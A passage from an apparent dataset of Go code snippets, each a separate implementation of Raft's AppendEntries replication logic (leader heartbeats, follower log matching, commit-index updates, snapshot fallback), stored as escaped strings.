nextIndex.Get(f)\n\t\t\tif !ok {\n\t\t\t\tpanic(\"nextIndex not found for follower \" + strconv.Itoa(f))\n\t\t\t}\n\n\t\t\tunlocked, ok := aeToken.Get(f)\n\n\t\t\tif !ok {\n\t\t\t\tpanic(\"aeToken not found for follower \" + strconv.Itoa(f))\n\t\t\t}\n\n\t\t\tif lastIndex != 0 && lastIndex >= n && unlocked == 1 {\n\t\t\t\taeToken.Set(f, 0)\n\t\t\t\t// send a new AppendEntry\n\t\t\t\tprevIndex := n - 1\n\t\t\t\tvar prevTerm int64 = 0\n\t\t\t\t// n = 0 when we add first entry to the log\n\t\t\t\tif prevIndex > 0 {\n\t\t\t\t\tprevTerm = s.localLog.Get(prevIndex).Term\n\t\t\t\t}\n\t\t\t\tae := &AppendEntry{Term: s.Term(), LeaderId: s.server.Pid(), PrevLogIndex: prevIndex, PrevLogTerm: prevTerm}\n\t\t\t\tae.LeaderCommit = s.commitIndex.Get()\n\t\t\t\tae.Entry = *s.localLog.Get(n)\n\t\t\t\ts.writeToLog(\"Replicating entry \" + strconv.FormatInt(n, 10))\n\t\t\t\ts.server.Outbox() <- &cluster.Envelope{Pid: f, Msg: ae}\n\t\t\t}\n\t\t}\n\t\ttime.Sleep(NICE * time.Millisecond)\n\t}\n}", "func (rf *Raft) AppendEntriesHandler(req *AppendEntriesRequest, resp *AppendEntriesResponse) {\n\n\t/*++++++++++++++++++++CRITICAL SECTION++++++++++++++++++++*/\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.info(\"AppendEntries RPC returns\")\n\n\trf.info(\"AppendEntries RPC receives %+v\", *req)\n\tresp.ResponseTerm = rf.currentTerm\n\n\t// 1. reply false if term < currentTerm (§5.1)\n\tif req.LeaderTerm < rf.currentTerm {\n\t\tresp.Info = TERM_OUTDATED\n\t\treturn\n\t}\n\n\t// reset the election timeout\n\trf.resetTrigger()\n\n\t// if RPC request or response contains term T > currentTerm:\n\t// set currentTerm = T, convert to follower (§5.1)\n\tif req.LeaderTerm > rf.currentTerm {\n\t\trf.currentTerm = req.LeaderTerm\n\t\trf.persist()\n\t\trf.role = FOLLOWER\n\t}\n\n\t// finds the position of the given PrevLogIndex at the log\n\tsliceIdx := req.PrevLogIndex - rf.offset\n\n\tswitch {\n\n\t// PrevLogIndex points beyond the end of the log,\n\t// handle it the same as if the entry exists but the term did not match\n\t// i.e., reply false\n\tcase sliceIdx >= len(rf.logs):\n\t\tresp.Info = LOG_INCONSISTENT\n\t\tresp.ConflictIndex = len(rf.logs) + rf.offset - 1\n\t\tresp.ConflictTerm = -1\n\t\treturn\n\n\t// PrevLogIndex matches the lastIncludedIndex (no log)\n\tcase sliceIdx == -1 && req.PrevLogIndex == 0:\n\n\t// PrevLogIndex matches the lastIncludedIndex in the snapshot\n\tcase sliceIdx == -1 && req.PrevLogIndex == rf.lastIncludedIndex:\n\n\tcase sliceIdx < 0:\n\t\tresp.Info = LOG_INCONSISTENT\n\t\tresp.ConflictIndex = 0\n\t\tresp.ConflictTerm = -1\n\t\tmsg := fmt.Sprintf(\"%s A=%d,C=%d,T=%d,O=%d,{...=>[%d|%d]}\",\n\t\t\ttime.Now().Format(\"15:04:05.000\"), rf.lastAppliedIndex, rf.commitIndex, rf.currentTerm, rf.offset, rf.lastIncludedIndex, rf.lastIncludedTerm)\n\n\t\tif len(rf.logs) == 0 {\n\t\t\tmsg += \"{} \"\n\t\t} else {\n\t\t\tmsg += fmt.Sprintf(\"{%+v->%+v} \", rf.logs[0], rf.logs[len(rf.logs)-1])\n\t\t}\n\t\tmsg += fmt.Sprintf(RAFT_FORMAT, rf.me)\n\t\tmsg += fmt.Sprintf(\"##### APPEND_ENTRIES REQ3%+v\", *req)\n\t\tmsg += \"\\n\"\n\n\t\tfmt.Println(msg)\n\t\treturn\n\n\tdefault:\n\t\t// 2. reply false if the log doesn't contain an entry at prevLogIndex\n\t\t// whose term matches prevLogTerm (§5.3)\n\t\tif rf.logs[sliceIdx].Term != req.PrevLogTerm {\n\t\t\tresp.ConflictTerm = rf.logs[sliceIdx].Term\n\t\t\tfor i := 0; i <= sliceIdx; i++ {\n\t\t\t\tif rf.logs[i].Term == resp.ConflictTerm {\n\t\t\t\t\tresp.ConflictIndex = rf.logs[i].Index\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tresp.Info = LOG_INCONSISTENT\n\t\t\treturn\n\t\t}\n\t}\n\n\tresp.Info = SUCCESS\n\n\t// 3. if an existing entry conflicts with a new one (same index\n\t// but different terms), delete the existing entry and all that\n\t// follow it (§5.3)\n\t// 4. append any new entries not already in the log\n\ti := sliceIdx + 1\n\tj := 0\n\n\tes := make([]LogEntry, len(req.Entries))\n\tcopy(es, req.Entries)\n\tfor j < len(es) {\n\t\tif i == len(rf.logs) {\n\t\t\trf.logs = append(rf.logs, es[j])\n\t\t} else if rf.logs[i].Term != es[j].Term {\n\t\t\trf.logs = rf.logs[:i]\n\t\t\trf.logs = append(rf.logs, es[j])\n\t\t}\n\t\ti++\n\t\tj++\n\t}\n\trf.persist()\n\n\t// 5. If leaderCommit > commitIndex, set commitIndex =\n\t// min(leaderCommit, index of last new entry)\n\trf.receiverTryUpdateCommitIndex(req)\n\t/*--------------------CRITICAL SECTION--------------------*/\n}", "func (r *Raft) handleAppendEntries(m pb.Message) {\n\n\tvar prevPosition = -1\n\tif len(r.RaftLog.entries) == 0 || m.Index < r.RaftLog.entries[0].Index {\n\t\tterm, err := r.RaftLog.storage.Term(m.Index)\n\t\tif err != nil || term != m.LogTerm {\n\t\t\tr.appendMsg(r.buildReject(pb.MessageType_MsgAppendResponse, m.From))\n\t\t\treturn\n\t\t}\n\t} else {\n\t\t//reject if prevPosition entry not findLastMatch\n\t\tvar found bool\n\t\tprevPosition, found = r.RaftLog.findByIndex(m.Index)\n\t\tif !found || r.RaftLog.entries[prevPosition].Term != m.LogTerm {\n\t\t\tr.appendMsg(r.buildReject(pb.MessageType_MsgAppendResponse, m.From))\n\t\t\treturn\n\t\t}\n\t}\n\n\toffset := 0\n\tfor ; offset < len(m.Entries); offset++ {\n\t\tif offset+prevPosition+1 >= len(r.RaftLog.entries) {\n\t\t\tr.RaftLog.append(m.Entries[offset:])\n\t\t\tbreak\n\t\t}\n\t\te1 := r.RaftLog.entries[offset+prevPosition+1]\n\t\te2 := m.Entries[offset]\n\t\tif e1.Index != e2.Index || e1.Term != e2.Term {\n\t\t\tr.RaftLog.entries = r.RaftLog.entries[:offset+prevPosition+1]\n\t\t\tif len(r.RaftLog.entries) > 0 {\n\t\t\t\tlastIndexInLog := r.RaftLog.entries[len(r.RaftLog.entries)-1].Index\n\t\t\t\tif lastIndexInLog < r.RaftLog.stabled {\n\t\t\t\t\tr.RaftLog.stabled = lastIndexInLog\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tr.RaftLog.stabled = 0\n\t\t\t}\n\t\t\tr.RaftLog.append(m.Entries[offset:])\n\t\t\tbreak\n\t\t}\n\t}\n\n\tmsg := r.buildMsgWithoutData(pb.MessageType_MsgAppendResponse, m.From, false)\n\tmsg.Index = r.RaftLog.LastIndex()\n\tr.appendMsg(msg)\n\n\t// update committed\n\tlastIndex := lastIndexInMeg(m)\n\tif m.Commit > r.RaftLog.committed && lastIndex > r.RaftLog.committed {\n\t\tr.RaftLog.committed = min(m.Commit, lastIndex)\n\t}\n\n\t// Your Code Here (2A).\n}", "func sendAppendEntries(s *Sailor, peer string) error {\n\tam := appendMessage{}\n\tam.Term = s.currentTerm\n\tam.LeaderId = s.client.NodeName\n\tam.PrevLogIndex = s.leader.nextIndex[peer] - 1\n\t// This is just some fancy logic to check for the bounds on the log\n\t// e.g. our log has 0 entries, so the prevEntryTerm cannot be pulled from the log\n\tif len(s.log) == 0 {\n\t\tam.PrevLogTerm = 0\n\t\tam.Entries = nil\n\t} else {\n\t\t// If our log is too short to have prevTerm, use 0\n\t\tif int(s.leader.nextIndex[peer])-2 < 0 {\n\t\t\tam.PrevLogTerm = 0\n\t\t} else {\n\t\t\tam.PrevLogTerm = s.log[s.leader.nextIndex[peer]-2].Term\n\t\t}\n\t\t// If our nextIndex is a value we don't have yet, send nothing\n\t\tif s.leader.nextIndex[peer] > uint(len(s.log)) {\n\t\t\tam.Entries = []entry{}\n\t\t} else {\n\t\t\tam.Entries = s.log[s.leader.nextIndex[peer]-1:]\n\t\t}\n\t}\n\n\tam.LeaderCommit = s.volatile.commitIndex\n\tap := messages.Message{}\n\tap.Type = \"appendEntries\"\n\tap.ID = 0\n\tap.Source = s.client.NodeName\n\tap.Value = makePayload(am)\n\treturn s.client.SendToPeer(ap, peer)\n}", "func (rf *Raft) heartbeatAppendEntries() {\n\t// make server -> reply map\n\treplies := make([]*AppendEntriesReply, len(rf.peers))\n\tfor servIdx := range rf.peers {\n\t\treplies[servIdx] = &AppendEntriesReply{}\n\t}\n\n\tfor !rf.killed() {\n\t\trf.mu.Lock()\n\n\t\t// if we are no longer the leader\n\t\tif rf.state != Leader {\n\t\t\trf.Log(LogDebug, \"Discovered no longer the leader, stopping heartbeat\")\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t}\n\t\t// send out heartbeats concurrently if leader\n\t\tfor servIdx := range rf.peers {\n\t\t\tif servIdx != rf.me {\n\n\t\t\t\t// successful request - update matchindex and nextindex accordingly\n\t\t\t\tif replies[servIdx].Success {\n\t\t\t\t\tif replies[servIdx].HighestLogIndexAdded > 0 {\n\t\t\t\t\t\trf.matchIndex[servIdx] = replies[servIdx].HighestLogIndexAdded\n\t\t\t\t\t}\n\t\t\t\t\trf.nextIndex[servIdx] = rf.matchIndex[servIdx] + 1\n\n\t\t\t\t\t// failed request - check for better term or decrease nextIndex\n\t\t\t\t} else if !replies[servIdx].Success && replies[servIdx].Returned {\n\n\t\t\t\t\t// we might have found out we shouldn't be the leader!\n\t\t\t\t\tif replies[servIdx].CurrentTerm > rf.currentTerm {\n\t\t\t\t\t\trf.Log(LogDebug, \"Detected server with higher term, stopping heartbeat and changing to follower.\")\n\t\t\t\t\t\trf.state = Follower\n\t\t\t\t\t\trf.currentTerm = replies[servIdx].CurrentTerm\n\n\t\t\t\t\t\t// persist - updated current term\n\t\t\t\t\t\tdata := rf.GetStateBytes(false)\n\t\t\t\t\t\trf.persister.SaveRaftState(data)\n\n\t\t\t\t\t\tgo rf.heartbeatTimeoutCheck()\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\n\t\t\t\t\t// failure - we need to decrease next index\n\t\t\t\t\t// 1. case where follower has no entry at the place we thought\n\t\t\t\t\t// => want to back up to start of follower log\n\t\t\t\t\t// 2. case where server has entry with different term NOT seen by leader\n\t\t\t\t\t// => want to back up nextIndex to the start of the 'run' of entries with that term (i.e. IndexFirstConflictingTerm)\n\t\t\t\t\t// 3. case where server has entry with different term that HAS been seen by leader\n\t\t\t\t\t// => want to back up to last entry leader has with that term\n\t\t\t\t\t//\n\t\t\t\t\t// Note for 2 and 3 ... if leader does not have the relevant log\n\t\t\t\t\t// entries, we need to call InstallSnapshot!\n\t\t\t\t\t//\n\t\t\t\t\trf.Log(LogInfo, \"Failed to AppendEntries to server\", servIdx, \"\\n - IndexFirstConflictingTerm\", replies[servIdx].IndexFirstConflictingTerm, \"\\n - ConflictingEntryTerm\", replies[servIdx].ConflictingEntryTerm, \"\\n - LastLogIndex\", replies[servIdx].LastLogIndex)\n\t\t\t\t\tif replies[servIdx].ConflictingEntryTerm == -1 {\n\t\t\t\t\t\t// case 1 - follower has no entry at the given location\n\t\t\t\t\t\trf.nextIndex[servIdx] = replies[servIdx].LastLogIndex + 1\n\t\t\t\t\t} else {\n\t\t\t\t\t\t// if not case 1, need to check we have the logs at and beyond\n\t\t\t\t\t\t// IndexFirstConflictingTerm\n\t\t\t\t\t\traftLogIdx := rf.getTrimmedLogIndex(replies[servIdx].IndexFirstConflictingTerm)\n\t\t\t\t\t\tif raftLogIdx == -1 {\n\t\t\t\t\t\t\t// don't have the logs we need - will need to snapshot\n\t\t\t\t\t\t\t// set nextIndex to the lastIncludedIndex to force this\n\t\t\t\t\t\t\trf.nextIndex[servIdx] = rf.lastIncludedIndex\n\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\tif rf.log[raftLogIdx].Term != replies[servIdx].ConflictingEntryTerm {\n\t\t\t\t\t\t\t\t// case 2 - follower has a term not seen by leader\n\t\t\t\t\t\t\t\trf.Log(LogDebug, \"Case 2: follower has a term not seen by leader\")\n\t\t\t\t\t\t\t\trf.nextIndex[servIdx] = replies[servIdx].IndexFirstConflictingTerm\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t// case 3 - follower has a term seen by leader\n\t\t\t\t\t\t\t\t// need to go to latest entry that leader has with this term\n\t\t\t\t\t\t\t\trf.Log(LogDebug, \"Case 3: follower has a term seen by leader, finding leader's latest entry with this term \\n - rf.log[\", rf.log)\n\t\t\t\t\t\t\t\trf.nextIndex[servIdx] = replies[servIdx].IndexFirstConflictingTerm\n\t\t\t\t\t\t\t\tfor rf.log[rf.getTrimmedLogIndex(rf.nextIndex[servIdx])].Term == replies[servIdx].ConflictingEntryTerm {\n\t\t\t\t\t\t\t\t\trf.nextIndex[servIdx]++\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\t// if we need to install a snapshot, then\n\t\t\t\t// nextIndex becomes the next index after the snapshot we will install\n\t\t\t\t// notice that we will then immediately send an AppendEntries request to the server,\n\t\t\t\t// and it will fail until the snapshot is installed, and we will just keep\n\t\t\t\t// resetting nextIndex\n\t\t\t\tif rf.nextIndex[servIdx] <= rf.lastIncludedIndex {\n\t\t\t\t\trf.Log(LogInfo, \"Failed to AppendEntries to server\", servIdx, \"- need to send InstallSnapshot!\")\n\t\t\t\t\trf.nextIndex[servIdx] = rf.lastIncludedIndex + 1\n\n\t\t\t\t\t// actually call the RPC\n\t\t\t\t\targs := &InstallSnapshotArgs{\n\t\t\t\t\t\tLeaderTerm: rf.currentTerm,\n\t\t\t\t\t\tSnapshot: rf.persister.ReadSnapshot(),\n\t\t\t\t\t}\n\t\t\t\t\treply := &InstallSnapshotReply{}\n\t\t\t\t\tgo rf.sendInstallSnapshot(servIdx, args, reply)\n\t\t\t\t}\n\n\t\t\t\t// send a new append entries request to the server if the last one has finished\n\t\t\t\trf.Log(LogDebug, \"rf.nextIndex for server\", servIdx, \"set to idx\", rf.nextIndex[servIdx], \"\\n - rf.log\", rf.log, \"\\n - rf.lastIncludedIndex\", rf.lastIncludedIndex, \"\\n - rf.lastIncludedTerm\", rf.lastIncludedTerm)\n\t\t\t\tentries := []LogEntry{}\n\t\t\t\tif len(rf.log) > 0 {\n\t\t\t\t\tentries = rf.log[rf.getTrimmedLogIndex(rf.nextIndex[servIdx]):]\n\t\t\t\t}\n\t\t\t\targs := &AppendEntriesArgs{\n\t\t\t\t\tLeaderTerm: rf.currentTerm,\n\t\t\t\t\tLeaderCommitIndex: rf.commitIndex,\n\t\t\t\t\tLogEntries: entries,\n\t\t\t\t}\n\n\t\t\t\t// only place the reply into replies, when the RPC completes,\n\t\t\t\t// to prevent partial data (unsure if this can happen but seems like a good idea)\n\t\t\t\tgo func(servIdx int) {\n\t\t\t\t\trf.Log(LogDebug, \"sendAppendEntries to servIdx\", servIdx)\n\t\t\t\t\treply := &AppendEntriesReply{}\n\t\t\t\t\tok := rf.sendAppendEntries(servIdx, args, reply)\n\t\t\t\t\tif ok {\n\t\t\t\t\t\trf.Log(LogDebug, \"Received AppendEntries reply from server\", servIdx, \"\\n - reply\", reply)\n\t\t\t\t\t\treplies[servIdx] = reply\n\t\t\t\t\t}\n\t\t\t\t}(servIdx)\n\t\t\t}\n\t\t}\n\n\t\t// walk up through possible new commit indices\n\t\t// update commit index\n\t\torigIndex := rf.commitIndex\n\t\tnewIdx := rf.commitIndex + 1\n\t\tfor len(rf.log) > 0 && newIdx <= rf.log[len(rf.log)-1].Index {\n\t\t\treplicas := 1 // already replicated in our log\n\t\t\tfor servIdx := range rf.peers {\n\t\t\t\tif servIdx != rf.me && rf.matchIndex[servIdx] >= newIdx {\n\t\t\t\t\treplicas++\n\t\t\t\t}\n\t\t\t}\n\t\t\tif replicas >= int(math.Ceil(float64(len(rf.peers))/2.0)) &&\n\t\t\t\tnewIdx > rf.lastIncludedIndex &&\n\t\t\t\trf.getTrimmedLogIndex(newIdx) >= 0 &&\n\t\t\t\trf.log[rf.getTrimmedLogIndex(newIdx)].Term == rf.currentTerm {\n\t\t\t\trf.commitIndex = newIdx\n\t\t\t\trf.Log(LogInfo, \"Entry \", rf.log[rf.getTrimmedLogIndex(rf.commitIndex)], \"replicated on a majority of servers. Commited to index\", rf.commitIndex)\n\t\t\t}\n\t\t\tnewIdx++\n\t\t}\n\n\t\t// send messages to applyCh for every message that was committed\n\t\tfor origIndex < rf.commitIndex {\n\t\t\torigIndex++\n\t\t\tif rf.getTrimmedLogIndex(origIndex) >= 0 {\n\t\t\t\trf.Log(LogInfo, \"Sending applyCh confirmation for commit of \", rf.log[rf.getTrimmedLogIndex(origIndex)], \"at index\", origIndex)\n\t\t\t\t{\n\t\t\t\t\trf.applyCh <- ApplyMsg{\n\t\t\t\t\t\tCommandValid: true,\n\t\t\t\t\t\tCommandIndex: origIndex,\n\t\t\t\t\t\tCommandTerm: rf.currentTerm,\n\t\t\t\t\t\tCommand: rf.log[rf.getTrimmedLogIndex(origIndex)].Command,\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\trf.mu.Unlock()\n\t\ttime.Sleep(heartbeatSendInterval)\n\t}\n}", "func (r *Raft) handleAppendEntries(m pb.Message) {\n\tif m.Term != None && m.Term < r.Term {\n\t\tr.sendAppendResponse(m.From, true, None, None)\n\t\treturn\n\t}\n\tr.electionElapsed = 0\n\tr.randomElectionTimeout = r.electionTimeout + rand.Intn(r.electionTimeout)\n\tr.Lead = m.From\n\tl := r.RaftLog\n\tlastIndex := l.LastIndex()\n\tif m.Index > lastIndex {\n\t\tr.sendAppendResponse(m.From, true, None, lastIndex+1)\n\t\treturn\n\t}\n\tif m.Index >= l.FirstIndex {\n\t\tlogTerm, err := l.Term(m.Index)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tif logTerm != m.LogTerm {\n\t\t\tindex := l.toEntryIndex(sort.Search(l.toSliceIndex(m.Index+1),\n\t\t\t\tfunc(i int) bool { return l.entries[i].Term == logTerm }))\n\t\t\tr.sendAppendResponse(m.From, true, logTerm, index)\n\t\t\treturn\n\t\t}\n\t}\n\n\tfor i, entry := range m.Entries {\n\t\tif entry.Index < l.FirstIndex {\n\t\t\tcontinue\n\t\t}\n\t\tif entry.Index <= l.LastIndex() {\n\t\t\tlogTerm, err := l.Term(entry.Index)\n\t\t\tif err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t\tif logTerm != entry.Term {\n\t\t\t\tidx := l.toSliceIndex(entry.Index)\n\t\t\t\tl.entries[idx] = *entry\n\t\t\t\tl.entries = l.entries[:idx+1]\n\t\t\t\tl.stabled = min(l.stabled, entry.Index-1)\n\t\t\t}\n\t\t} else {\n\t\t\tn := len(m.Entries)\n\t\t\tfor j := i; j < n; j++ {\n\t\t\t\tl.entries = append(l.entries, *m.Entries[j])\n\t\t\t}\n\t\t\tbreak\n\t\t}\n\t}\n\tif m.Commit > l.committed {\n\t\tl.committed = min(m.Commit, m.Index+uint64(len(m.Entries)))\n\t}\n\tr.sendAppendResponse(m.From, false, None, l.LastIndex())\n}", "func (rf *Raft) StartAppendLog() {\n\tvar count int32 = 1\n\tfor i, _ := range rf.peers {\n\t\tif i == rf.me {\n\t\t\tcontinue\n\t\t}\n\t\tgo func(i int) {\n\t\t\tfor{\n\t\t\t\trf.mu.Lock()\n\t\t\t\t//fmt.Printf(\"follower %d lastlogindex: %v, nextIndex: %v\\n\",i, rf.GetPrevLogIndex(i), rf.nextIndex[i])\n\t\t\t\t//fmt.Print(\"sending log entries from leader %d to peer %d for term %d\\n\", rf.me, i, rf.currentTerm)\n\t\t\t\t//fmt.Print(\"nextIndex:%d\\n\", rf.nextIndex[i])\n\t\t\t\tif rf.state != Leader {\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\targs := AppendEntriesArgs{\n\t\t\t\t\tTerm: rf.currentTerm,\n\t\t\t\t\tLeaderId: rf.me,\n\t\t\t\t\tPrevLogIndex: rf.GetPrevLogIndex(i),\n\t\t\t\t\tPrevLogTerm: rf.GetPrevLogTerm(i),\n\t\t\t\t\tEntries: append(make([]LogEntry, 0), rf.logEntries[rf.nextIndex[i]:]...),\n\t\t\t\t\tLeaderCommit: rf.commitIndex,\n\t\t\t\t}\n\t\t\t\treply := AppendEntriesReply{}\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tok := rf.sendAppendEntries(i, &args, &reply)\n\n\t\t\t\tif !ok {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\trf.mu.Lock()\n\t\t\t\tif rf.state != Leader {\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif reply.Term > rf.currentTerm {\n\t\t\t\t\trf.BeFollower(reply.Term)\n\t\t\t\t\tgo func() {\n\t\t\t\t\t\tsend(rf.appendEntry)\n\t\t\t\t\t}()\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif reply.Success {\n\t\t\t\t\trf.matchIndex[i] = args.PrevLogIndex + len(args.Entries)\n\t\t\t\t\trf.nextIndex[i] = rf.matchIndex[i] + 1\n\t\t\t\t\t//fmt.Print(\"leader: %v, for peer %v, match index: %d, next index: %d, peers: %d\\n\", rf.me, i, rf.matchIndex[i], rf.nextIndex[i], len(rf.peers))\n\t\t\t\t\tatomic.AddInt32(&count, 1)\n\t\t\t\t\tif atomic.LoadInt32(&count) > int32(len(rf.peers)/2) {\n\t\t\t\t\t\t//fmt.Print(\"leader %d reach agreement\\n, args.prevlogindex:%d, len:%d\\n\", rf.me, args.PrevLogIndex, len(args.Entries))\n\t\t\t\t\t\trf.UpdateCommitIndex()\n\t\t\t\t\t}\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t} else {\n\t\t\t\t\t//fmt.Printf(\"peer %d reset the next index from %d to %d\\n\", i, rf.nextIndex[i], rf.nextIndex[i]-1)\n\t\t\t\t\tif rf.nextIndex[i] > 0 {\n\t\t\t\t\t\trf.nextIndex[i]--\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t} else {\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\ttime.Sleep(10 * time.Millisecond)\n\t\t\t}\n\t\t}(i)\n\t}\n\n}", "func (r *Raft) handleAppendEntries(m pb.Message) {\n\tif m.Term >= r.Term {\n\t\t// if not a follower\n\t\tr.becomeFollower(m.Term, m.From)\n\t\t// check if m.prevLog exists\n\t\ttargetTerm, err := r.RaftLog.Term(m.Index)\n\t\tif err != nil && m.Index > 0 {\n\t\t\tr.rejectAppendEntries(m)\n\t\t\treturn\n\t\t}\n\t\tif targetTerm != m.LogTerm {\n\t\t\tr.rejectAppendEntries(m)\n\t\t\treturn\n\t\t} else {\n\t\t\tr.forceAppendEntries(m)\n\t\t\tr.updateCommittedIndex(m)\n\t\t\tr.acceptAppendEntries(m)\n\t\t\t//r.RaftLog.stabled = r.RaftLog.committed\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tr.rejectAppendEntries(m)\n\t\treturn\n\t}\n\n}", "func (rf *Raft) AppendEntry(args AppendEntryArgs, reply *AppendEntryReply) {\n\t// Your code here.\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif args.Term < rf.currentTerm {\n\t\treply.Success = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\trf.state = FOLLOWER\n\trf.currentTerm = args.Term\n\trf.votedFor = -1\n\treply.Term = args.Term\n\n\tif args.PrevLogIndex >= 0 &&\n\t\t(len(rf.log)-1 < args.PrevLogIndex ||\n\t\t\trf.log[args.PrevLogIndex].Term != args.PrevLogTerm) {\n\t\treply.Success = false\n\t\treply.CommitIndex = min(len(rf.log)-1, args.PrevLogIndex)\n\t\tfor reply.CommitIndex >= 0 &&\n\t\t\trf.log[reply.CommitIndex].Term != args.PrevLogTerm {\n\t\t\treply.CommitIndex--\n\t\t}\n\t} else if args.Entries != nil {\n\t\trf.log = append(rf.log[:args.PrevLogIndex+1], args.Entries...)\n\t\tif len(rf.log) > args.LeaderCommit {\n\t\t\trf.commitIndex = args.LeaderCommit\n\t\t\t//TODO:commitlog\n\t\t\tgo rf.CommitLog()\n\t\t}\n\t\treply.CommitIndex = len(rf.log) - 1\n\t\treply.Success = true\n\t} else {\n\t\tif len(rf.log) > args.LeaderCommit {\n\t\t\trf.commitIndex = args.LeaderCommit\n\t\t\t//TODO:commitlog\n\t\t\tgo rf.CommitLog()\n\t\t}\n\t\treply.CommitIndex = args.PrevLogIndex\n\t\treply.Success = true\n\t}\n\trf.persist()\n\trf.timer.Reset(properTimeDuration(rf.state))\n}", "func (r *raft) appendEntriesReceiver(p *AppendEntries) (*AppendEntriesResults, error) {\n\tif p.Term < r.currentTerm {\n\t\treturn &AppendEntriesResults{Term: r.currentTerm, Success: false}, nil\n\t}\n\n\tlastIndex, err := r.log.LastIndex()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif lastIndex < p.PrevLogIndex {\n\t\treturn &AppendEntriesResults{Term: r.currentTerm, Success: false}, nil\n\t}\n\tentries, err := r.log.Read(p.PrevLogIndex, p.PrevLogIndex+1)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif entries[0].Term != p.PrevLogTerm {\n\t\treturn &AppendEntriesResults{Term: r.currentTerm, Success: false}, nil\n\t}\n\t// 3. If an existing entry conflicts with a new one(same index but different terms),\n\t// delete the existing entry and all that follow\n\t// 4. Append any new entries not alredy in the log\n\t// TODO: just overwrite directly, is it most efficient?\n\t//r.log = append(r.log[:p.PrevLogIndex], p.Entries...)\n\tif err := r.log.Write(p.PrevLogIndex+1, p.Entries); err != nil {\n\t\treturn nil, err\n\t}\n\n\tif p.LeaderCommit > r.commitIndex {\n\t\t// attention: the log's last index has been updated\n\t\tlastIndex, err := r.log.LastIndex()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tr.commitIndex = min(p.LeaderCommit, lastIndex)\n\t\t// TODO:apply the new committed log to state machine\n\t\t// and update lastApplied\n\t\tentries, err = r.log.Read(r.lastApplied+1, r.commitIndex+1)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\t// TODO: need save lastApplied to file as currentTerm and votedFor ?\n\t\tr.applier.Apply(entries)\n\t\tr.votedFor = p.LeaderId\n\t\tr.lastApplied = r.commitIndex\n\t}\n\tr.currentTerm = p.Term\n\treturn &AppendEntriesResults{Term: r.currentTerm, Success: true}, nil\n}", "func (rf *Raft) sendEntries() {\n\trf.mu.Lock()\n\tlastLog := rf.getLastLog()\n\trf.mu.Unlock()\n\tfor i := range rf.peers {\n\t\tif i == rf.me {\n\t\t\tcontinue\n\t\t}\n\t\trf.mu.Lock()\n\t\tmatchIndex := rf.LeaderStatus.matchIndex[i]\n\t\tnextIndex := rf.LeaderStatus.nextIndex[i]\n\t\t//DPrintf(\"send entry peer=%v matchIndex=%v lastIndex=%v nextIndex=%v\", i, matchIndex, lastLog.Index, nextIndex)\n\t\tvar req *AppendEntriesArgs\n\t\t// TODO: whether delete ???\n\t\tif matchIndex >= lastLog.Index {\n\t\t\treq = &AppendEntriesArgs{\n\t\t\t\tType: HeartBeat,\n\t\t\t\tTerm: rf.currentTerm,\n\t\t\t\tLeaderId: rf.peerId,\n\t\t\t\tLeaderCommit: rf.commitIndex,\n\t\t\t}\n\t\t\tDPrintf(\"peer=%v send heartbeat to peer=%v\", rf.me, i)\n\t\t} else {\n\t\t\t// TODO: if the logEntries be cutoff after make snapshot, we should shift the start index\n\t\t\tlogEntries := rf.logEntries[matchIndex+1 : min(nextIndex+1, len(rf.logEntries))]\n\t\t\tprevLog := rf.logEntries[matchIndex]\n\t\t\treq = &AppendEntriesArgs{\n\t\t\t\tType: Entries,\n\t\t\t\tTerm: rf.currentTerm,\n\t\t\t\tLeaderId: rf.peerId,\n\t\t\t\tPrevLogIndex: prevLog.Index,\n\t\t\t\tPrevLogTerm: prevLog.Term,\n\t\t\t\tLogEntries: logEntries, // TODO: refine to control each time send message count (case 2B)\n\t\t\t\tLeaderCommit: rf.commitIndex,\n\t\t\t}\n\t\t\t//DPrintf(\"peer=%v send entry=%v to=%v next=%v logEntrySize=%d\", rf.me, rf.logEntries[matchIndex+1 : nextIndex+1], i, nextIndex, len(logEntries))\n\t\t}\n\t\trf.mu.Unlock()\n\t\tgo rf.sendAppendEntries(i, req, &AppendEntriesReply{})\n\t}\n}", "func (s *server) processAppendEntriesResponse(resp *AppendEntriesResponse) {\n\t// If we find a higher term then change to a follower and exit.\n\tif resp.Term() > s.Term() {\n\t\ts.updateCurrentTerm(resp.Term(), \"\")\n\t\treturn\n\t}\n\n\t// panic response if it's not successful.\n\tif !resp.Success() {\n\t\treturn\n\t}\n\n\t// if one peer successfully append a log from the leader term,\n\t// we add it to the synced list\n\tif resp.append == true 